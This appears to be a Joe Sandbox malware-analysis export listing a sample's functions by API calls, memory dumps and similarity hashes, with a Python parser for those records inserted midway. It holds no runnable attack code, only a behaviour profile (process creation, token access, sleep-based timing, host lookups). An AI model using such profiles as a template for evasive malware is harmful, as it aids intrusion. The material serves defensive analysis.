                                                                                                                            • Instruction ID: 7242d645a119212ef22dba4d7f773872f9b0d6e664e1a64cc6241c15f7dc8138
                                                                                                                            • Opcode Fuzzy Hash: d2d4f1c9551e3eae97817ab7bfe8b271923cfedfa28c6274beac5b0a7f3f7fde
                                                                                                                            • Instruction Fuzzy Hash: A8114832C0051DD7CF009FA4E848AEEBF78FB4A751F104055EE50B2280DB709594ABA1
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F3D84D
                                                                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F3D864
                                                                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F3D879
                                                                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F3D897
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1352324309-0
                                                                                                                            • Opcode ID: fea50a25e3477693882add478e98c2141257e891b59410c5d6e34873e0f6cf0d
                                                                                                                            • Instruction ID: 93fdce0e207df5ce7b1562cf0370d493109126e183dd966d95793f346f0aba7b
                                                                                                                            • Opcode Fuzzy Hash: fea50a25e3477693882add478e98c2141257e891b59410c5d6e34873e0f6cf0d
                                                                                                                            • Instruction Fuzzy Hash: B0115E75A05304DBE3208F51FC48F92BBBCEB00B20F108569E916D7490D7F0F549ABA1
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                            • Instruction ID: 381e7ebb3a13da18f42ab26a3393250a14447ded476daf72f184a7c0b4d26722
                                                                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                            • Instruction Fuzzy Hash: AA01397644824ABBCF166E84CC058EE3F72BB1C3A0B598415FA1C58031D336DAB1BB81
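The function records in this listing (the APIs / Memory Dump Source / Similarity blocks) are what an analyst scrapes when pivoting on a sample: which function resolves hostnames, which one calls Sleep, and whether the same Opcode ID turns up in another report of the same family. The parser below is an added example and is not code from Joe Sandbox or its IDA plugin; it reads the record format exactly as printed on this page into Python objects, separating a function's own API references from the "Part of subcall function" references, and strips the "Download File" link text the HTML export glues onto dump file names. The embedded SAMPLE is transcribed from the gethostbyname and QueryPerformanceCounter records above, abbreviated to a single Associated line; the field keys (API ID, Opcode ID, Instruction Fuzzy Hash) are the report's own, while `parse_records`, `functions_calling` and `shared_opcode_ids` are names chosen here.

```python
"""Parse Joe Sandbox IDA-plugin function records into structured objects that can
be searched by API name and compared by Opcode ID across reports.
Added example, not Joe Sandbox code. SAMPLE is transcribed from two records of
this report, abbreviated."""
import re
from dataclasses import dataclass, field

# One API reference line, direct or via a subcall, e.g.
#   • gethostbyname.WSOCK32(?,?,?), ref: 00F56399
#   • Part of subcall function 00EE5A15: WideCharToMultiByte.KERNEL32(...), ref: 00EE5A2C
API_REF = re.compile(
    r"^•\s*(?P<sub>Part of subcall function (?P<subaddr>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_0-9@]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
# Any other '• Key: value' bullet (Source File, Associated, API ID, Opcode ID, ...).
FIELD = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")


@dataclass
class FunctionRecord:
    api_calls: list = field(default_factory=list)  # refs made by the function itself
    subcalls: list = field(default_factory=list)   # refs made inside functions it calls
    fields: dict = field(default_factory=dict)     # metadata keyed as printed in the report


def parse_records(text: str) -> list:
    """Split the listing on 'APIs' headers and parse each record that follows."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                       # every record opens with this header
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line:
            continue
        m = API_REF.match(line)
        if m:
            call = {"api": m["name"], "module": m["module"],
                    "args": [a for a in (m["args"] or "").split(",") if a],
                    "ref": m["ref"]}
            if m["sub"]:
                call["via"] = m["subaddr"]       # address of the callee making the call
                cur.subcalls.append(call)
            else:
                cur.api_calls.append(call)
            continue
        m = FIELD.match(line)
        if m:
            # The HTML export fuses the 'Download File' link text onto dump names.
            val = m["val"].replace("Download File", "").strip()
            cur.fields.setdefault(m["key"], val)  # first 'Associated' dump is kept
    return records


def functions_calling(records: list, api_name: str) -> list:
    """Records that reference api_name directly or through a subcall."""
    return [r for r in records
            if any(c["api"] == api_name for c in r.api_calls + r.subcalls)]


def shared_opcode_ids(a: list, b: list) -> set:
    """Opcode IDs present in both record sets: functions two reports have in common."""
    ids = lambda rs: {r.fields["Opcode ID"] for r in rs if "Opcode ID" in r.fields}
    return ids(a) & ids(b)


SAMPLE = """\
APIs
  • Part of subcall function 00EE5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F47896,?,?,00000000), ref: 00EE5A2C
• gethostbyname.WSOCK32(?,?,?), ref: 00F56399
• WSAGetLastError.WSOCK32(00000000), ref: 00F563A4
• _memmove.LIBCMT ref: 00F563D1
• inet_ntoa.WSOCK32(?), ref: 00F563DC
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 1504782959-0
• Opcode ID: da69b85c71ea2af7c8e0673070f146530c29eeaf50b7ef745ce5946b92bd11d7
• Instruction Fuzzy Hash: 1D116A32900109AFCB00FBA5ED46CEEB7F8AF04314B044075F915B7262DB30AE08EBA1
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F3FCED,?,00F40D40,?,00008000), ref: 00F4115F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F3FCED,?,00F40D40,?,00008000), ref: 00F41184
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F3FCED,?,00F40D40,?,00008000), ref: 00F4118E
• Sleep.KERNEL32(?,?,?,?,?,?,?,00F3FCED,?,00F40D40,?,00008000), ref: 00F411C1
Similarity
• API ID: CounterPerformanceQuerySleep
• Opcode ID: d2d4f1c9551e3eae97817ab7bfe8b271923cfedfa28c6274beac5b0a7f3f7fde
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in functions_calling(recs, "gethostbyname"):
        print(r.fields["Opcode ID"], [c["api"] for c in r.api_calls])
```

Feed `parse_records` the whole exported listing rather than SAMPLE and `shared_opcode_ids` becomes a cheap way to check whether two reports contain byte-identical functions; the Opcode ID is an exact hash, so near-matches need the Instruction Fuzzy Hash field, which this parser keeps but does not compare.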
                                                                                                                            APIs
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00F6B2E4
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00F6B2FC
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00F6B320
                                                                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F6B33B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 357397906-0
                                                                                                                            • Opcode ID: 73a817bb37679ba79bb93eb9733faaae8302f070208d9e7284ebccc26978c8ce
                                                                                                                            • Instruction ID: dee2bbe7d7c69a08efb5bf40787f6a793c5c064ad5d620ef3a77649a1734eb5e
                                                                                                                            • Opcode Fuzzy Hash: 73a817bb37679ba79bb93eb9733faaae8302f070208d9e7284ebccc26978c8ce
                                                                                                                            • Instruction Fuzzy Hash: 14114675D0020DEFDB41CF99D4449EEBBB5FB08310F104166E924E3220D775AA659F50
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F6B644
                                                                                                                            • _memset.LIBCMT ref: 00F6B653
                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00FA6F20,00FA6F64), ref: 00F6B682
                                                                                                                            • CloseHandle.KERNEL32 ref: 00F6B694
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3277943733-0
                                                                                                                            • Opcode ID: 561303e55a89d0224200214a04bf2a0989bdea7f24ceb6ad9575b479d9243ace
                                                                                                                            • Instruction ID: 0a3da5e7ef4b57118f729dddec6a849c3f5a181ee02fe0bd3811e8e249dc0a12
                                                                                                                            • Opcode Fuzzy Hash: 561303e55a89d0224200214a04bf2a0989bdea7f24ceb6ad9575b479d9243ace
                                                                                                                            • Instruction Fuzzy Hash: 62F0FEF25403087EE6106765BC0AFBB7A9CEB0A795F044021FA18E5192F7B65C10B7B8
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00F46BE6
                                                                                                                              • Part of subcall function 00F476C4: _memset.LIBCMT ref: 00F476F9
                                                                                                                            • _memmove.LIBCMT ref: 00F46C09
                                                                                                                            • _memset.LIBCMT ref: 00F46C16
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00F46C26
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 48991266-0
                                                                                                                            • Opcode ID: f92a733aba62e261f4426c9bd9524ce0caa97d45b88b6cff355dfd2b4a246cd0
                                                                                                                            • Instruction ID: c12bb424e6ab47a39f390aac292f7e7d1ddb008d7a7a5d28213a77cd2986e06e
                                                                                                                            • Opcode Fuzzy Hash: f92a733aba62e261f4426c9bd9524ce0caa97d45b88b6cff355dfd2b4a246cd0
                                                                                                                            • Instruction Fuzzy Hash: 70F0543A100104ABCF016F55EC85A4ABF2AEF45360F048061FE085E267C775E811EBB4
                                                                                                                            APIs
                                                                                                                            • GetSysColor.USER32(00000008), ref: 00EE2231
                                                                                                                            • SetTextColor.GDI32(?,000000FF), ref: 00EE223B
                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00EE2250
                                                                                                                            • GetStockObject.GDI32(00000005), ref: 00EE2258
                                                                                                                            • GetWindowDC.USER32(?,00000000), ref: 00F1BE83
                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F1BE90
                                                                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 00F1BEA9
                                                                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 00F1BEC2
                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00F1BEE2
                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00F1BEED
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1946975507-0
                                                                                                                            • Opcode ID: d06350e350f0a61cd69148e8199eec871536f0c13a1eef24179f8dd312b288fc
                                                                                                                            • Instruction ID: bfabeb45239bb779dfb7081f2a302612bc152a28550b94eea2cae80a71acc7d7
                                                                                                                            • Opcode Fuzzy Hash: d06350e350f0a61cd69148e8199eec871536f0c13a1eef24179f8dd312b288fc
                                                                                                                            • Instruction Fuzzy Hash: 32E03932904248EBDB215FA4FC0D7D83B11EB16336F048366FA79980E187B24984EB12
                                                                                                                            APIs
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 00F3871B
                                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F382E6), ref: 00F38722
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F382E6), ref: 00F3872F
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F382E6), ref: 00F38736
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3974789173-0
                                                                                                                            • Opcode ID: 05a5055108809f38c29570af9889a7f8ded329545c13da6072c884707855eb37
                                                                                                                            • Instruction ID: 4b92c65e68f24d886a5dd09f7e9003b679d947523c5151ae55f3d44f30d72635
                                                                                                                            • Opcode Fuzzy Hash: 05a5055108809f38c29570af9889a7f8ded329545c13da6072c884707855eb37
                                                                                                                            • Instruction Fuzzy Hash: 6FE08637A15316ABD7205FB07D0DB563BACEF507E1F144828F245CB040DA78844AEB50
                                                                                                                            APIs
                                                                                                                            • __getptd_noexit.LIBCMT ref: 00F05DAD
                                                                                                                              • Part of subcall function 00F099C4: GetLastError.KERNEL32(00000000,00F00DD3,00F08B2D,00F057A3,?,?,00F00DD3,?), ref: 00F099C6
                                                                                                                              • Part of subcall function 00F099C4: __calloc_crt.LIBCMT ref: 00F099E7
                                                                                                                              • Part of subcall function 00F099C4: __initptd.LIBCMT ref: 00F09A09
                                                                                                                              • Part of subcall function 00F099C4: GetCurrentThreadId.KERNEL32 ref: 00F09A10
                                                                                                                              • Part of subcall function 00F099C4: SetLastError.KERNEL32(00000000,00F00DD3,?), ref: 00F09A28
                                                                                                                            • CloseHandle.KERNEL32(?,?,00F05D8C), ref: 00F05DC1
                                                                                                                            • __freeptd.LIBCMT ref: 00F05DC8
                                                                                                                            • ExitThread.KERNEL32 ref: 00F05DD0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4169687693-0
                                                                                                                            • Opcode ID: e061b8d4deee923e19fa392220c91826e61e3623905961b7bdd49aadc582bf0b
                                                                                                                            • Instruction ID: 9ca0e8058b657de18895cbc96542b29deca9da2e0d856f3d5a4d626673536207
                                                                                                                            • Opcode Fuzzy Hash: e061b8d4deee923e19fa392220c91826e61e3623905961b7bdd49aadc582bf0b
                                                                                                                            • Instruction Fuzzy Hash: 8AD0A771406F1147C23227309C0E62A77509F00B71B444219F075451F1DBE45803BE41
                                                                                                                            APIs
                                                                                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 00F3B4BE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ContainedObject
                                                                                                                            • String ID: AutoIt3GUI$Container
                                                                                                                            • API String ID: 3565006973-3941886329
                                                                                                                            • Opcode ID: 9f796b9f3492449f51b2e3e362240185331fa5202e3ff12a034dc7583a8d8f78
                                                                                                                            • Instruction ID: e10588e56d283d272a60a29a546b52b5a01fcfc4182c3d4ba6c9bb86cebb0fdb
                                                                                                                            • Opcode Fuzzy Hash: 9f796b9f3492449f51b2e3e362240185331fa5202e3ff12a034dc7583a8d8f78
                                                                                                                            • Instruction Fuzzy Hash: 5B914971600701EFDB54DF64C894B6ABBE5FF48720F24856EEA4ACB291DB70E841DB60
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EFFC86: _wcscpy.LIBCMT ref: 00EFFCA9
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                            • __wcsnicmp.LIBCMT ref: 00F4B02D
                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F4B0F6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
APIs
• Sleep.KERNEL32(00000000), ref: 00EF2968
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00EF2981
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
APIs
  • Part of subcall function 00EE4F0B: __fread_nolock.LIBCMT ref: 00EE4F29
• _wcscmp.LIBCMT ref: 00F49824
• _wcscmp.LIBCMT ref: 00F49837
Strings
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
APIs
• _memset.LIBCMT ref: 00F5259E
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F525D4
Strings
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00F67B61
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F67B76
Strings
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 00F66B17
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F66B53
Strings
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
APIs
• _memset.LIBCMT ref: 00F42911
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F4294C
Strings
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
• __snwprintf.LIBCMT ref: 00F53A66
  • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
Strings
Similarity
• API ID: __snwprintf_memmove
• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 3506404897-2584243854
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F66761
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F6676C
Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID: Combobox
                                                                                                                            • API String ID: 3850602802-2096851135
                                                                                                                            • Opcode ID: 9cc8ee62db39694dc322008f4ab03cdfe9af8cd72a00bc7c842cc93c74c12d99
                                                                                                                            • Instruction ID: 706ad81bc43b33edaa597fd2b88883f294cfaff4190bf9527733c618e3d214d8
                                                                                                                            • Opcode Fuzzy Hash: 9cc8ee62db39694dc322008f4ab03cdfe9af8cd72a00bc7c842cc93c74c12d99
                                                                                                                            • Instruction Fuzzy Hash: 8C11B271600208AFEF118F54DC80EAB3B6AEB48368F110129F914D7290DA75DC51A7A0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EE1D73
                                                                                                                              • Part of subcall function 00EE1D35: GetStockObject.GDI32(00000011), ref: 00EE1D87
                                                                                                                              • Part of subcall function 00EE1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EE1D91
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00F66C71
                                                                                                                            • GetSysColor.USER32(00000012), ref: 00F66C8B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                            • String ID: static
                                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                                            • Opcode ID: 5b1bbf4d2702daf4093e94f4b3185fcbf9fa8a8821b75db9748d25272584ac48
                                                                                                                            • Instruction ID: 496da1589eabde141cdcd7d72aeb592699382d07bfa95885e8fd8304b524b7fb
                                                                                                                            • Opcode Fuzzy Hash: 5b1bbf4d2702daf4093e94f4b3185fcbf9fa8a8821b75db9748d25272584ac48
                                                                                                                            • Instruction Fuzzy Hash: 64212972910209AFDF04DFA8DC45AEA7BA8FB08315F044629F995E3250D675E850EB60
                                                                                                                            APIs
                                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00F669A2
                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F669B1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
